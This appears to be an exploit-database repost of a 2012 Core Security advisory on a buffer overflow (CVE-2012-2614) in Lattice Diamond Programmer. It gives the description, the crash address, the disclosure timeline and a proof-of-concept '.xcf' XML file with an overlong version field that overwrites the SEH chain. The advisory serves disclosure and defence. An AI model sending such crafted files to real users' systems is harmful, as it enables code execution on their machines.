0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Lattice Diamond Programmer Buffer Overflow

Author

Core Security

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

Lattice Diamond Programmer Buffer Overflow


1. *Advisory Information*

Title: Lattice Diamond Programmer Buffer Overflow
Advisory ID: CORE-2012-0530
Advisory URL:
http://www.coresecurity.com/content/lattice-diamond-programmer-buffer-overflow
Date published: 2012-06-21
Date of last update: 2012-06-21
Vendors contacted: Lattice Semiconductor Corporation
Release mode: User release


2. *Vulnerability Information*

Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2012-2614


3. *Vulnerability Description*

Lattice Diamond Programmer [1] is vulnerable to client-side attacks,
which can be exploited by remote attackers to run arbitrary code by
sending specially crafted '.xcf' files.


4. *Vulnerable packages*

   . Diamond Programmer 1.4.2 for Windows.
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . Vendor did not provide this information.


6. *Vendor Information, Solutions and Workarounds*

The vendor did not reply any contact email sent by Core Security
Advisories Team. Contact Lattice for further information about this
issue [2]. Given that this is a client-side vulnerability, affected
users should not open untrusted '.xcf' files using 'programmer.exe' nor
'deployment.exe'.


7. *Credits*

This vulnerability was discovered and researched by Daniel Kazimirow and
Ricardo Narvaja from Core Security Exploit Team.


8. *Technical Description / Proof of Concept Code*

This vulnerability can be exploited by opening a specially crafted
'.xcf' file from 'programmer.exe'. The module 'deployment.exe' may also
be vulnerable, but this possiblity was not researched any further.

The XML file showed at [Sec. 8.1] crashes 'programmer.exe' at the address:

/-----
00FB5E20    8A0402          MOV AL,BYTE PTR DS:[EDX+EAX]
00FB5E23    C2 0400         RETN 4
-----/

 and overwrites the SEH chain (there is no SEH protection) with
'41414141', which is proof that the buffer was overflown. This means
that there is a buffer overflow vulnerability, and 'EIP' can be set to
an arbitrary value, allowing an attacker to take control of the machine.


8.1. *Proof of Concept*

/-----
<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE        ispXCF    SYSTEM    "IspXCF.dtd" >
<ispXCF
version="8.9.09.09999999999AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
    <Comment></Comment>
    <Chain>
        <Comm>JTAG</Comm>
        <Device>
            <Pos>1</Pos>
            <Vendor>Lattice</Vendor>
            <Family>ispLSI 5000VE</Family>
            <Name>5256VE</Name>
            <IDCode>0x00368043</IDCode>
            <Package>128-pin TQFP</Package>
            <PON>ispLSI5256VE-XXLT128</PON>
            <Bypass>
                <InstrLen>5</InstrLen>
                <InstrVal>11111</InstrVal>
                <BScanLen>1</BScanLen>
                <BScanVal>0</BScanVal>
            </Bypass>
            <File>C:\ispTOOLS\ispvmsystem\TutorialU6vea.jed</File>
            <FileTime>05/17/02 18:15:33</FileTime>
            <JedecChecksum>0xF9BD</JedecChecksum>
            <Operation>Erase,Program,Verify</Operation>
            <Option>
                <SVFVendor>JTAG STANDARD</SVFVendor>
                <IOState>HighZ</IOState>
               
<IOVectorData>0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000</IOVectorData>
                <Reinitialize value="TRUE"/>
                <OverideUES value="TRUE"/>
                <TCKFrequency>1.000000 MHz</TCKFrequency>
                <SVFProcessor>ispVM</SVFProcessor>
                <Usercode>0x0000F9BD</Usercode>
            </Option>
        </Device>
    </Chain>
    <ProjectOptions>
        <Program>SEQUENTIAL</Program>
        <Process>ENTIRED CHAIN</Process>
        <OperationOverride>No Override</OperationOverride>
        <StartTAP>TLR</StartTAP>
        <EndTAP>TLR</EndTAP>
        <DeGlitch value="TRUE"/>
        <VerifyUsercode value="TRUE"/>
        <PinSetting>
            TMS    LOW;
            TCK    LOW;
            TDI    LOW;
            TDO    LOW;
            TRST    ABSENT;
            CableEN    HIGH;
        </PinSetting>
    </ProjectOptions>
</ispXCF>
-----/


9. *Report Timeline*

. 2012-05-30:
Core Security Technologies notifies Lattice Semiconductor Corporation of
the vulnerability. Publication date is set for June 26th, 2012.

. 2012-06-06:
Core notifies Lattice Semiconductor Corporation of the vulnerability.

. 2012-06-11:
Core notifies that the previous emails were not answered and requests
for a reply.

. 2012-06-11:
Vendor asks Core to remove their email addresses from Core's mailing lists.

. 2012-06-11:
Core requests an email address or any other security contact information
at Lattice in order to begin discussions in regards to the
vulnerability. No reply was received.

. 2012-06-21:
Advisory CORE-2012-0530 published.


10. *References*

[1] http://www.latticesemi.com/products/designsoftware/diamond/index.cfm.
[2] Lattice technical support, mailto:techsupport@latticesemi.com.



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Lattice Diamond Programmer Buffer Overflow

Report Error

Report Error